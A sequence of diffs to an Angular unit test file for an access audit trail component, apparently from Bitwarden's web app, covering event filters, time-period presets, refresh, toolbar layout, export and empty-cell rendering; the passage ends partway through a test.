+            startDate: "Start date",
+            endDate: "End date",
+            invalidDateRange: "Invalid date range.",
             pamAuditNoMatchesTitle: "No matching events",
             pamAuditNoMatchesMessage: "No events match the current filters.",
             pamAuditColumnTime: "Time",
@@ -263,7 +270,7 @@ describe("AccessAuditComponent", () => {
     await fixture.whenStable();
     fixture.detectChanges();
     expect(component().filteredRows()).toHaveLength(2);
-    expect(fixture.nativeElement.querySelector("bit-chip-filter")).toBeNull();
+    expect(fixture.debugElement.query(By.directive(FilterMenuComponent))).not.toBeNull();
 
     const rows = openKindMenu();
     expect(rows.map((row) => row.textContent?.trim())).toEqual([
@@ -322,5 +329,131 @@ describe("AccessAuditComponent", () => {
 
     expect(component().filteredRows()).toHaveLength(1);
     expect(component().filteredRows()[0].actor).toBe("Ada");
+  });
+
+  it("offers an actor option per identity that acted, plus the system bucket", async () => {
+    auditApiService.listAccessAuditTrail.mockResolvedValue([
+      event({ ActorId: "user-1", ActorName: "Ada" }),
+      event({ ActorId: "user-1", ActorName: "Ada" }),
+      event({ ActorId: "user-3", ActorName: "Linus" }),
+      event({ ActorId: null, ActorName: null, Automated: true }),
+    ]);
+
+    fixture.detectChanges();
+    await fixture.whenStable();
+
+    expect(component().actorOptions()).toEqual([
+      { label: "Ada", value: "user-1" },
+      { label: "Linus", value: "user-3" },
+      { label: "System", value: "automated" },
+    ]);
+  });
+
+  it("offers no actor option for an identity that resolved to neither a name nor an email", async () => {
+    auditApiService.listAccessAuditTrail.mockResolvedValue([
+      event({ ActorId: "user-9", ActorName: null, ActorEmail: null }),
+    ]);
+
+    fixture.detectChanges();
+    await fixture.whenStable();
+
+    expect(component().actorOptions()).toEqual([]);
+  });
+
+  it("separates two requesters who share a display name", async () => {
+    auditApiService.listAccessAuditTrail.mockResolvedValue([
+      event({ RequesterId: "user-2", RequesterName: "J. Smith" }),
+      event({ RequesterId: "user-4", RequesterName: "J. Smith" }),
+    ]);
+
+    fixture.detectChanges();
+    await fixture.whenStable();
+
+    expect(component().requesterOptions()).toHaveLength(2);
+
+    component().requesterControl.setValue("user-4");
+
+    expect(component().filteredRows()).toHaveLength(1);
+    expect(component().filteredRows()[0].requesterId).toBe("user-4");
+  });
+
+  it("filters rows to the selected actor", async () => {
+    auditApiService.listAccessAuditTrail.mockResolvedValue([
+      event({ ActorId: "user-1", ActorName: "Ada" }),
+      event({ ActorId: "user-3", ActorName: "Linus" }),
+    ]);
+
+    fixture.detectChanges();
+    await fixture.whenStable();
+
+    component().actorControl.setValue("user-3");
+
+    expect(component().filteredRows()).toHaveLength(1);
+    expect(component().filteredRows()[0].actor).toBe("Linus");
+  });
+
+  it("bounds the rows by a date range read in the viewer's own zone", async () => {
+    const noon = new Date(2026, 7, 18, 12, 0);
+    const evening = new Date(2026, 7, 18, 18, 0);
+    auditApiService.listAccessAuditTrail.mockResolvedValue([
+      event({ OccurredAt: noon.toISOString() }),
+      event({ OccurredAt: evening.toISOString() }),
+    ]);
+
+    fixture.detectChanges();
+    await fixture.whenStable();
+
+    component().fromControl.setValue("2026-08-18T13:00");
+
+    expect(component().filteredRows()).toHaveLength(1);
+    expect(component().filteredRows()[0].occurredAt).toEqual(evening);
+
+    component().fromControl.setValue("");
+    component().toControl.setValue("2026-08-18T12:00");
+
+    expect(component().filteredRows()).toHaveLength(1);
+    expect(component().filteredRows()[0].occurredAt).toEqual(noon);
+  });
+
+  it("leaves the table alone and reports an inverted range rather than emptying it", async () => {
+    auditApiService.listAccessAuditTrail.mockResolvedValue([event(), event()]);
+
+    fixture.detectChanges();
+    await fixture.whenStable();
+
+    component().fromControl.setValue("2026-08-18T18:00");
+    component().toControl.setValue("2026-08-18T09:00");
+    fixture.detectChanges();
+
+    expect(component().invertedRange()).toBe(true);
+    expect(component().filteredRows()).toHaveLength(2);
+    expect(fixture.nativeElement.querySelector("bit-error").textContent).toContain(
+      "Invalid date range.",
+    );
+  });
+
+  // Every filter is a predicate over the one already-fetched window; the endpoint takes no query
+  // parameters, so a filter change that re-read it would be a bug, not an optimisation.
+  it("does not re-read the trail when a filter changes", async () => {
+    auditApiService.listAccessAuditTrail.mockResolvedValue([
+      event({ Kind: "leaseActivated", ActorId: "user-1", RequesterId: "user-2" }),
+      event({ ActorId: "user-3", RequesterId: "user-4" }),
+    ]);
+
+    fixture.detectChanges();
+    await fixture.whenStable();
+    expect(auditApiService.listAccessAuditTrail).toHaveBeenCalledTimes(1);
+    fixture.detectChanges();
+
+    component().searchControl.setValue("ada");
+    kindChip().toggle("pamAuditKindLeaseActivated");
+    component().actorControl.setValue("user-1");
+    component().requesterControl.setValue("user-2");
+    component().fromControl.setValue("2026-08-18T00:00");
+    component().toControl.setValue("2026-08-19T00:00");
+    fixture.detectChanges();
+    await fixture.whenStable();
+
+    expect(auditApiService.listAccessAuditTrail).toHaveBeenCalledTimes(1);
   });
 });

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -1092,8 +1092,7 @@ describe("AccessAuditComponent", () => {
       }
     });
 
-    // Four chips of one height need no vertical nudge; the offsets existed only to line them up with
-    // the labelled date fields that are now in the dialog.
+    // The chips are all one height, so nothing in the row needs an offset to line up.
     it("carries no height nudges", async () => {
       const toolbar = await renderToolbar();
 

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -139,6 +139,7 @@ describe("AccessAuditComponent", () => {
             removeItem: (name?: string) => `Remove ${name}`,
             search: "Search",
             exportVerb: "Export",
+            update: "Update",
             close: "Close",
           }),
         },
@@ -519,6 +520,132 @@ describe("AccessAuditComponent", () => {
     expect(auditApiService.listAccessAuditTrail).toHaveBeenCalledTimes(1);
   });
 
+  describe("update", () => {
+    const renderReady = async (events = [event()]) => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue(events);
+
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+    };
+
+    const clickUpdate = () => {
+      fixture.nativeElement.querySelector("#access-audit_button_refresh").click();
+    };
+
+    // The endpoint takes no parameters, so re-reading it is the only way to see an event recorded
+    // since the page opened — which is what Update is for here, the filters being live already.
+    it("re-reads the trail when Update is pressed", async () => {
+      await renderReady();
+      expect(auditApiService.listAccessAuditTrail).toHaveBeenCalledTimes(1);
+
+      auditApiService.listAccessAuditTrail.mockResolvedValue([
+        event(),
+        event({ Kind: "leaseActivated" }),
+      ]);
+      clickUpdate();
+      await fixture.whenStable();
+      fixture.detectChanges();
+
+      expect(auditApiService.listAccessAuditTrail).toHaveBeenCalledTimes(2);
+      expect(auditApiService.listAccessAuditTrail).toHaveBeenLastCalledWith(ORGANIZATION_ID);
+      expect(component().rows()).toHaveLength(2);
+      expect(component().status()).toBe("ready");
+    });
+
+    it("re-reads the member lookup alongside the trail", async () => {
+      await renderReady();
+
+      clickUpdate();
+      await fixture.whenStable();
+
+      expect(organizationUserApiService.getAllMiniUserDetails).toHaveBeenCalledTimes(2);
+    });
+
+    // Dropping to the loading state would take the table, the filters and the pressed button out of
+    // the DOM for the length of the request.
+    it("keeps the rendered trail on screen while a refresh is in flight", async () => {
+      await renderReady();
+
+      let release!: (events: AccessAuditEventResponse[]) => void;
+      auditApiService.listAccessAuditTrail.mockReturnValueOnce(
+        new Promise<AccessAuditEventResponse[]>((resolve) => (release = resolve)),
+      );
+
+      const refreshed = component().load();
+      fixture.detectChanges();
+
+      expect(component().status()).toBe("ready");
+      expect(fixture.nativeElement.querySelector("bit-table")).not.toBeNull();
+
+      release([event(), event()]);
+      await refreshed;
+
+      expect(component().rows()).toHaveLength(2);
+    });
+
+    // A transient failure must not cost the auditor the trail they were reading; `bitAction` reports it.
+    it("keeps the rendered trail when a refresh fails, and raises the failure", async () => {
+      await renderReady();
+
+      auditApiService.listAccessAuditTrail.mockRejectedValueOnce(new Error("boom"));
+
+      await expect(component().load()).rejects.toThrow("boom");
+
+      expect(component().status()).toBe("ready");
+      expect(component().rows()).toHaveLength(1);
+    });
+  });
+
+  describe("toolbar", () => {
+    const renderToolbar = async () => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue([event()]);
+
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+
+      return fixture.nativeElement.querySelector("#access-audit_container_toolbar") as HTMLElement;
+    };
+
+    it("renders every control in one row", async () => {
+      const toolbar = await renderToolbar();
+
+      expect(toolbar).not.toBeNull();
+      expect(toolbar.querySelectorAll("bit-filter-menu")).toHaveLength(1);
+      expect(toolbar.querySelectorAll("bit-chip-filter")).toHaveLength(2);
+      for (const control of [
+        "#access-audit_input_from",
+        "#access-audit_input_to",
+        "#access-audit_button_refresh",
+        "#access-audit_button_export",
+      ]) {
+        expect(toolbar.querySelector(control)).not.toBeNull();
+      }
+    });
+
+    // The date inputs are taller than a chip or a button by the height of their label, so everything
+    // beside them carries the same offset the event log uses; without it the row sits ragged.
+    it("offsets the controls that have no label so they line up with the date inputs", async () => {
+      const toolbar = await renderToolbar();
+
+      const chips = toolbar.querySelector("bit-chip-filter")!.parentElement!;
+      expect(chips.classList).toContain("tw-mt-7");
+      for (const button of ["#access-audit_button_refresh", "#access-audit_button_export"]) {
+        expect(toolbar.querySelector(button)!.classList).toContain("tw-mt-7");
+      }
+    });
+
+    it("wraps the row rather than overflowing it", async () => {
+      const toolbar = await renderToolbar();
+
+      expect(toolbar.classList).toContain("tw-flex-wrap");
+      expect(toolbar.querySelector("bit-chip-filter")!.parentElement!.classList).toContain(
+        "tw-flex-wrap",
+      );
+    });
+  });
+
   describe("export", () => {
     const clickExport = () => {
       fixture.nativeElement.querySelector("#access-audit_button_export").click();
@@ -579,6 +706,19 @@ describe("AccessAuditComponent", () => {
       clickExport();
 
       expect(auditApiService.listAccessAuditTrail).toHaveBeenCalledTimes(1);
+    });
+
+    // `bwi-import` is the export glyph in this icon set, and the icon both event-log surfaces settled on.
+    it("carries the export icon", async () => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue([event()]);
+
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+
+      const icon = fixture.nativeElement.querySelector("#access-audit_button_export i");
+      expect(icon).not.toBeNull();
+      expect(icon.classList).toContain("bwi-import");
     });
 
     it("disables Export while no row matches the filters", async () => {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -1398,6 +1398,90 @@ describe("AccessAuditComponent", () => {
     });
   });
 
+  describe("empty cells", () => {
+    const ACTOR = 2;
+    const REQUESTER = 3;
+    const DETAIL = 6;
+
+    const render = async (events: AccessAuditEventResponse[]) => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue(events);
+
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+    };
+
+    const cell = (column: number): HTMLElement =>
+      Array.from<HTMLElement>(fixture.nativeElement.querySelectorAll("bit-table tbody tr td"))[
+        column
+      ];
+
+    const text = (column: number) => cell(column).textContent!.trim();
+
+    it("renders the actor's name when the row names one", async () => {
+      await render([event({ ActorId: "user-9", ActorName: "Linus" })]);
+
+      expect(text(ACTOR)).toBe("Linus");
+    });
+
+    it("renders an em dash for a row with no actor", async () => {
+      await render([event({ ActorId: null, ActorName: null, ActorEmail: null })]);
+
+      expect(text(ACTOR)).toBe("—");
+    });
+
+    // "System" is a value, not an absence: an automated row has an actor, it just is not a person.
+    it("keeps the System label rather than a dash for an automated row", async () => {
+      await render([event({ ActorId: null, ActorName: null, ActorEmail: null, Automated: true })]);
+
+      expect(text(ACTOR)).toBe("System");
+    });
+
+    it("renders the requester's name when the row names one", async () => {
+      await render([event({ RequesterId: "user-9", RequesterName: "Linus" })]);
+
+      expect(text(REQUESTER)).toBe("Linus");
+    });
+
+    it("renders an em dash for a row with no requester", async () => {
+      await render([event({ RequesterId: null, RequesterName: null, RequesterEmail: null })]);
+
+      expect(text(REQUESTER)).toBe("—");
+    });
+
+    it("renders the detail when the row carries one", async () => {
+      await render([event({ Detail: "Incident closed early." })]);
+
+      expect(text(DETAIL)).toBe("Incident closed early.");
+    });
+
+    it("renders an em dash for a row with no detail", async () => {
+      await render([event({ Detail: null })]);
+
+      expect(text(DETAIL)).toBe("—");
+    });
+
+    // A blank cell in an audit table reads as a rendering failure rather than as "no value".
+    it("leaves no cell of a bare row blank", async () => {
+      await render([
+        event({
+          ActorId: null,
+          ActorName: null,
+          ActorEmail: null,
+          RequesterId: null,
+          RequesterName: null,
+          RequesterEmail: null,
+          Detail: null,
+        }),
+      ]);
+
+      for (const column of [ACTOR, REQUESTER, DETAIL]) {
+        expect(text(column)).toBe("—");
+        expect(cell(column).querySelector(".tw-text-muted")).not.toBeNull();
+      }
+    });
+  });
+
   describe("column widths", () => {
     /** Time, Event, Actor, Requester, Item, Duration, Detail — the order the template declares. */
     const TIME = 0;

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -1816,6 +1816,23 @@ describe("AccessAuditComponent", () => {
       expect(cells[ITEM].classList).toContain("tw-break-words");
     });
 
+    it("floors Item so the auto table overflows instead of collapsing the column", async () => {
+      const { headers, cells } = await renderTable();
+
+      expect(headers[ITEM].classList).toContain("tw-min-w-48");
+      expect(cells[ITEM].classList).toContain("tw-min-w-48");
+    });
+
+    it("keeps the Item floor beneath the cap and beside the bitCell padding", async () => {
+      const { cells } = await renderTable();
+
+      // Same HostBinding merge as above: the floor is inert unless it survives alongside tw-p-3,
+      // and it is only a floor while the cap is still there to bound the other end.
+      expect(cells[ITEM].classList).toContain("tw-p-3");
+      expect(cells[ITEM].classList).toContain("tw-min-w-48");
+      expect(cells[ITEM].classList).toContain("tw-max-w-64");
+    });
+
     it("leaves the unbounded name columns free to wrap", async () => {
       const { cells } = await renderTable();
 

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -212,6 +212,19 @@ describe("AccessAuditComponent", () => {
         value: (option.componentInstance as FilterOptionComponent).value(),
       }));
 
+  /**
+   * Opens the Event menu and returns its rendered rows. The menu body is stamped into a CDK overlay
+   * on the document, not inside the fixture's host element, so it cannot be reached through the
+   * fixture. Multi-select, so the rows are checkboxes and there is no "All" row to reset from.
+   */
+  const openKindMenu = () => {
+    (fixture.nativeElement as HTMLElement)
+      .querySelector<HTMLButtonElement>("bit-filter-menu button[aria-haspopup]")!
+      .click();
+    fixture.detectChanges();
+    return Array.from(document.querySelectorAll<HTMLButtonElement>("[role='menuitemcheckbox']"));
+  };
+
   it("reads the trail for the organization in the route", async () => {
     auditApiService.listAccessAuditTrail.mockResolvedValue([event()]);
 
@@ -307,9 +320,47 @@ describe("AccessAuditComponent", () => {
     await fixture.whenStable();
     fixture.detectChanges();
 
+    expect(component().kindOptions()).toEqual([
+      { label: "Lease activated", value: "pamAuditKindLeaseActivated" },
+      { label: "Request approved", value: "pamAuditKindRequestApproved" },
+    ]);
+  });
+
+  // The signal above is what the chip is bound to; this is what the chip does with it. Kept as its own
+  // test because the binding in between is where the option list has actually broken before — an option
+  // read a beat before Angular has bound its `value` throws NG0950 and renders nothing.
+  it("declares each event kind into the Event menu, sorted, one per distinct label", async () => {
+    auditApiService.listAccessAuditTrail.mockResolvedValue([
+      event({ Kind: "requestApproved" }),
+      event({ Kind: "leaseActivated" }),
+      event({ Kind: "requestApproved" }),
+    ]);
+
+    fixture.detectChanges();
+    await fixture.whenStable();
+    fixture.detectChanges();
+
     expect(kindMenuOptions()).toEqual([
       { label: "Lease activated", value: "pamAuditKindLeaseActivated" },
       { label: "Request approved", value: "pamAuditKindRequestApproved" },
+    ]);
+  });
+
+  // Declaring an option and rendering it are different failures. The rows are stamped into a CDK
+  // overlay only when the menu opens, which is the moment the NG0950 above would surface.
+  it("renders a checkable row per event kind when the Event menu is opened", async () => {
+    auditApiService.listAccessAuditTrail.mockResolvedValue([
+      event({ Kind: "leaseActivated" }),
+      event({ Kind: "requestApproved" }),
+    ]);
+
+    fixture.detectChanges();
+    await fixture.whenStable();
+    fixture.detectChanges();
+
+    expect(openKindMenu().map((row) => row.textContent?.trim())).toEqual([
+      "Lease activated",
+      "Request approved",
     ]);
   });
 
@@ -356,7 +407,12 @@ describe("AccessAuditComponent", () => {
     expect(component().filteredRows()).toHaveLength(1);
     expect(component().filteredRows()[0].actor).toBe("Grace");
 
+    // Multi-select, so the second kind joins the first rather than replacing it. Both buckets
+    // selected is every revoke back again, which is what tells the two apart from one relabelled kind.
     kindChip().toggle("pamAuditKindLeaseRevoked");
+    expect(component().filteredRows()).toHaveLength(2);
+
+    kindChip().toggle("pamAuditKindLeaseEndedByHolder");
     expect(component().filteredRows()).toHaveLength(1);
     expect(component().filteredRows()[0].actor).toBe("Ada");
   });

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -109,6 +109,12 @@ describe("AccessAuditComponent", () => {
             pamAccessRules: "Access rules",
             backTo: "Back to __$1__",
             viewItemsIn: "View items in __$1__",
+            removeItem: "Remove __$1__",
+            all: "All",
+            clear: "Clear",
+            noMatchingItems: "No matching items",
+            search: "Search",
+            resetSearch: "Reset search",
             from: "From",
             to: "To",
             startDate: "Start date",
@@ -135,9 +141,6 @@ describe("AccessAuditComponent", () => {
             pamAuditKindRuleCreated: "Access rule created",
             pamAuditKindLeaseRevoked: "Lease revoked",
             pamAuditKindLeaseEndedByHolder: "Lease ended by holder",
-            all: "All",
-            removeItem: (name?: string) => `Remove ${name}`,
-            search: "Search",
             exportVerb: "Export",
             update: "Update",
             close: "Close",
@@ -177,29 +180,34 @@ describe("AccessAuditComponent", () => {
   /** The component's protected surface, reached the way the template reaches it. */
   const component = () => fixture.componentInstance as unknown as Record<string, any>;
 
-  /** The Event chip, driven the way the menu rows drive it. */
-  const kindChip = () =>
-    fixture.debugElement.query(By.directive(FilterMenuComponent))
-      .componentInstance as FilterMenuComponent;
+  /**
+   * Selects a chip's option through the `FilterControl` contract the chips expose. A
+   * `bit-filter-menu` owns its own selection — there is no form control to set — and the chips only
+   * exist once the ready branch has rendered.
+   */
+  const selectFilter = (key: string, value: unknown) => {
+    fixture.detectChanges();
+    const control = component()
+      .filterControls()
+      .find((candidate: any) => candidate.key() === key);
+    control.setValue(value);
+    fixture.detectChanges();
+  };
+
+  /** The Event chip, which is the first of the chips the toolbar declares. */
+  const kindMenu = () => fixture.debugElement.queryAll(By.directive(FilterMenuComponent))[0];
+
+  /** The Event chip driven through its own selection API, the way its menu rows drive it. */
+  const kindChip = () => kindMenu().componentInstance as FilterMenuComponent;
 
   /** The options declared into the Event menu, in template order. */
   const kindMenuOptions = () =>
-    fixture.debugElement.queryAll(By.directive(FilterOptionComponent)).map((option) => ({
-      label: (option.componentInstance as FilterOptionComponent).label(),
-      value: (option.componentInstance as FilterOptionComponent).value(),
-    }));
-
-  /**
-   * Opens the Event menu and returns its rendered rows, "All" first. The menu body is stamped
-   * into a CDK overlay on the document, not inside the fixture's host element.
-   */
-  const openKindMenu = () => {
-    (fixture.nativeElement as HTMLElement)
-      .querySelector<HTMLButtonElement>("bit-filter-menu button[aria-haspopup]")!
-      .click();
-    fixture.detectChanges();
-    return Array.from(document.querySelectorAll<HTMLButtonElement>("[role='menuitemradio']"));
-  };
+    kindMenu()
+      .queryAll(By.directive(FilterOptionComponent))
+      .map((option) => ({
+        label: (option.componentInstance as FilterOptionComponent).label(),
+        value: (option.componentInstance as FilterOptionComponent).value(),
+      }));
 
   it("reads the trail for the organization in the route", async () => {
     auditApiService.listAccessAuditTrail.mockResolvedValue([event()]);
@@ -312,17 +320,9 @@ describe("AccessAuditComponent", () => {
     await fixture.whenStable();
     fixture.detectChanges();
     expect(component().filteredRows()).toHaveLength(2);
-    expect(fixture.debugElement.query(By.directive(FilterMenuComponent))).not.toBeNull();
+    expect(fixture.nativeElement.querySelector("bit-chip-filter")).toBeNull();
 
-    const rows = openKindMenu();
-    expect(rows.map((row) => row.textContent?.trim())).toEqual([
-      "All",
-      "Lease activated",
-      "Request approved",
-    ]);
-
-    rows[1].click();
-    fixture.detectChanges();
+    selectFilter("kind", "pamAuditKindLeaseActivated");
 
     expect(component().filteredRows()).toHaveLength(1);
     expect(component().filteredRows()[0].kindLabelKey).toBe("pamAuditKindLeaseActivated");
@@ -409,7 +409,7 @@ describe("AccessAuditComponent", () => {
       { label: "J. Smith (smith-b@example.com)", value: "user-4" },
     ]);
 
-    component().requesterControl.setValue("user-4");
+    selectFilter("requester", "user-4");
 
     expect(component().filteredRows()).toHaveLength(1);
     expect(component().filteredRows()[0].requesterId).toBe("user-4");
@@ -424,7 +424,7 @@ describe("AccessAuditComponent", () => {
     fixture.detectChanges();
     await fixture.whenStable();
 
-    component().actorControl.setValue("user-3");
+    selectFilter("actor", "user-3");
 
     expect(component().filteredRows()).toHaveLength(1);
     expect(component().filteredRows()[0].actor).toBe("Linus");
@@ -509,9 +509,9 @@ describe("AccessAuditComponent", () => {
     expect(auditApiService.listAccessAuditTrail).toHaveBeenCalledTimes(1);
     fixture.detectChanges();
 
-    kindChip().toggle("pamAuditKindLeaseActivated");
-    component().actorControl.setValue("user-1");
-    component().requesterControl.setValue("user-2");
+    selectFilter("kind", "pamAuditKindLeaseActivated");
+    selectFilter("actor", "user-1");
+    selectFilter("requester", "user-2");
     component().fromControl.setValue("2026-08-18T00:00");
     component().toControl.setValue("2026-08-19T00:00");
     fixture.detectChanges();
@@ -567,6 +567,29 @@ describe("AccessAuditComponent", () => {
       expect(auditApiService.listAccessAuditTrail).toHaveBeenCalledTimes(2);
       expect(component().status()).toBe("ready");
       expect(component().rows()).toHaveLength(1);
+    });
+
+    // The chips build their options from the trail, so a refresh that brings back a kind the page has
+    // never rendered adds an option to an already-mounted chip.
+    it("takes on an event kind that only the refresh brought back", async () => {
+      await renderReady();
+      expect(component().kindOptions()).toHaveLength(1);
+
+      auditApiService.listAccessAuditTrail.mockResolvedValue([
+        event(),
+        event({ Kind: "leaseActivated" }),
+      ]);
+      clickUpdate();
+      await fixture.whenStable();
+      fixture.detectChanges();
+
+      expect(component().kindOptions()).toEqual([
+        { label: "Lease activated", value: "pamAuditKindLeaseActivated" },
+        { label: "Request approved", value: "pamAuditKindRequestApproved" },
+      ]);
+      expect(
+        fixture.nativeElement.querySelectorAll("bit-filter-menu bit-filter-option").length,
+      ).toBeGreaterThan(1);
     });
 
     it("re-reads the member lookup alongside the trail", async () => {
@@ -628,8 +651,7 @@ describe("AccessAuditComponent", () => {
       const toolbar = await renderToolbar();
 
       expect(toolbar).not.toBeNull();
-      expect(toolbar.querySelectorAll("bit-filter-menu")).toHaveLength(1);
-      expect(toolbar.querySelectorAll("bit-chip-filter")).toHaveLength(2);
+      expect(toolbar.querySelectorAll("bit-filter-menu")).toHaveLength(3);
       for (const control of [
         "#access-audit_input_from",
         "#access-audit_input_to",
@@ -645,7 +667,7 @@ describe("AccessAuditComponent", () => {
     it("offsets the controls that have no label so they line up with the date inputs", async () => {
       const toolbar = await renderToolbar();
 
-      const chips = toolbar.querySelector("bit-chip-filter")!.parentElement!;
+      const chips = toolbar.querySelector("bit-filter-menu")!.parentElement!;
       expect(chips.classList).toContain("tw-mt-7");
       for (const button of ["#access-audit_button_refresh", "#access-audit_button_export"]) {
         expect(toolbar.querySelector(button)!.classList).toContain("tw-mt-7");
@@ -656,7 +678,7 @@ describe("AccessAuditComponent", () => {
       const toolbar = await renderToolbar();
 
       expect(toolbar.classList).toContain("tw-flex-wrap");
-      expect(toolbar.querySelector("bit-chip-filter")!.parentElement!.classList).toContain(
+      expect(toolbar.querySelector("bit-filter-menu")!.parentElement!.classList).toContain(
         "tw-flex-wrap",
       );
     });
@@ -685,8 +707,7 @@ describe("AccessAuditComponent", () => {
       await fixture.whenStable();
       fixture.detectChanges();
 
-      component().actorControl.setValue("user-3");
-      fixture.detectChanges();
+      selectFilter("actor", "user-3");
       clickExport();
 
       expect(component().rows()).toHaveLength(3);
@@ -749,8 +770,7 @@ describe("AccessAuditComponent", () => {
       const button = fixture.nativeElement.querySelector("#access-audit_button_export");
       expect(button.getAttribute("aria-disabled")).toBeNull();
 
-      kindChip().toggle("pamAuditKindLeaseActivated");
-      fixture.detectChanges();
+      selectFilter("kind", "pamAuditKindLeaseActivated");
       await fixture.whenStable();
       fixture.detectChanges();
 

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -115,11 +115,13 @@ describe("AccessAuditComponent", () => {
             noMatchingItems: "No matching items",
             search: "Search",
             resetSearch: "Reset search",
-            from: "From",
-            to: "To",
-            startDate: "Start date",
-            endDate: "End date",
-            invalidDateRange: "Invalid date range.",
+            timePeriod: "Time period",
+            allTime: "All time",
+            recentlyActiveToday: "Today",
+            recentlyActivePast7Days: "Past 7 days",
+            recentlyActivePast30Days: "Past 30 days",
+            custom: "Custom",
+            clearAll: "Clear all",
             pamAuditNoMatchesTitle: "No matching events",
             pamAuditNoMatchesMessage: "No events match the current filters.",
             pamAuditColumnTime: "Time",
@@ -185,12 +187,9 @@ describe("AccessAuditComponent", () => {
    * `bit-filter-menu` owns its own selection — there is no form control to set — and the chips only
    * exist once the ready branch has rendered.
    */
-  const selectFilter = (key: string, value: unknown) => {
+  const selectFilter = (chip: "kind" | "actor" | "requester" | "timePeriod", value: unknown) => {
     fixture.detectChanges();
-    const control = component()
-      .filterControls()
-      .find((candidate: any) => candidate.key() === key);
-    control.setValue(value);
+    component()[`${chip}Chip`]().setValue(value);
     fixture.detectChanges();
   };
 
@@ -430,70 +429,195 @@ describe("AccessAuditComponent", () => {
     expect(component().filteredRows()[0].actor).toBe("Linus");
   });
 
-  it("bounds the rows by a date range read in the viewer's own zone", async () => {
-    const noon = new Date(2026, 7, 18, 12, 0);
-    const evening = new Date(2026, 7, 18, 18, 0);
-    auditApiService.listAccessAuditTrail.mockResolvedValue([
-      event({ OccurredAt: noon.toISOString() }),
-      event({ OccurredAt: evening.toISOString() }),
-    ]);
+  describe("time period", () => {
+    const HOUR_MS = 60 * 60 * 1000;
+    const DAY_MS = 24 * HOUR_MS;
 
-    fixture.detectChanges();
-    await fixture.whenStable();
+    /** Stamped from the real clock so the presets, which read the same clock, line up with the fixtures. */
+    const now = () => new Date();
+    const startOfToday = () => {
+      const today = now();
+      return new Date(today.getFullYear(), today.getMonth(), today.getDate());
+    };
 
-    component().fromControl.setValue("2026-08-18T13:00");
+    const renderTrail = async (occurredAt: Date[]) => {
+      auditApiService.listAccessAuditTrail.mockResolvedValue(
+        occurredAt.map((at) => event({ OccurredAt: at.toISOString() })),
+      );
+      fixture.detectChanges();
+      await fixture.whenStable();
+      fixture.detectChanges();
+    };
 
-    expect(component().filteredRows()).toHaveLength(1);
-    expect(component().filteredRows()[0].occurredAt).toEqual(evening);
+    const occurredAt = () =>
+      component()
+        .filteredRows()
+        .map((row: any) => row.occurredAt.getTime());
 
-    component().fromControl.setValue("");
-    component().toControl.setValue("2026-08-18T12:00");
+    it("bounds Today at the start of the viewer's own day, not twenty-four hours back", async () => {
+      const thisMorning = new Date(startOfToday().getTime() + HOUR_MS);
+      const lateLastNight = new Date(startOfToday().getTime() - HOUR_MS);
+      await renderTrail([thisMorning, lateLastNight]);
 
-    expect(component().filteredRows()).toHaveLength(1);
-    expect(component().filteredRows()[0].occurredAt).toEqual(noon);
+      selectFilter("timePeriod", "today");
+
+      expect(occurredAt()).toEqual([thisMorning.getTime()]);
+    });
+
+    it("bounds Past 7 days seven days back from now", async () => {
+      const recent = new Date(now().getTime() - 6 * DAY_MS);
+      const older = new Date(now().getTime() - 8 * DAY_MS);
+      await renderTrail([recent, older]);
+
+      selectFilter("timePeriod", "past7Days");
+
+      expect(occurredAt()).toEqual([recent.getTime()]);
+    });
+
+    it("bounds Past 30 days thirty days back from now", async () => {
+      const recent = new Date(now().getTime() - 20 * DAY_MS);
+      const older = new Date(now().getTime() - 40 * DAY_MS);
+      await renderTrail([recent, older]);
+
+      selectFilter("timePeriod", "past30Days");
+
+      expect(occurredAt()).toEqual([recent.getTime()]);
+    });
+
+    // "All time" is the chip's own reset row: it means the whole fetched window, which is all this client
+    // holds.
+    it("drops the bounds again when the chip is reset to All time", async () => {
+      const recent = new Date(now().getTime() - HOUR_MS);
+      const older = new Date(now().getTime() - 40 * DAY_MS);
+      await renderTrail([recent, older]);
+
+      selectFilter("timePeriod", "past7Days");
+      expect(component().filteredRows()).toHaveLength(1);
+
+      selectFilter("timePeriod", null);
+
+      expect(component().filteredRows()).toHaveLength(2);
+    });
+
+    describe("custom range", () => {
+      const closesWith = (result: unknown) => {
+        dialogService.open.mockReturnValue({ closed: of(result) } as any);
+      };
+
+      const chooseCustom = async () => {
+        selectFilter("timePeriod", "custom");
+        await fixture.whenStable();
+        fixture.detectChanges();
+      };
+
+      it("applies the bounds the dialog confirmed and leaves the chip active", async () => {
+        const noon = new Date(2026, 7, 18, 12, 0);
+        const evening = new Date(2026, 7, 18, 18, 0);
+        await renderTrail([noon, evening]);
+        closesWith({ from: "2026-08-18T13:00", to: "" });
+
+        await chooseCustom();
+
+        expect(occurredAt()).toEqual([evening.getTime()]);
+        expect(component().selectedPeriod()).toBe("custom");
+      });
+
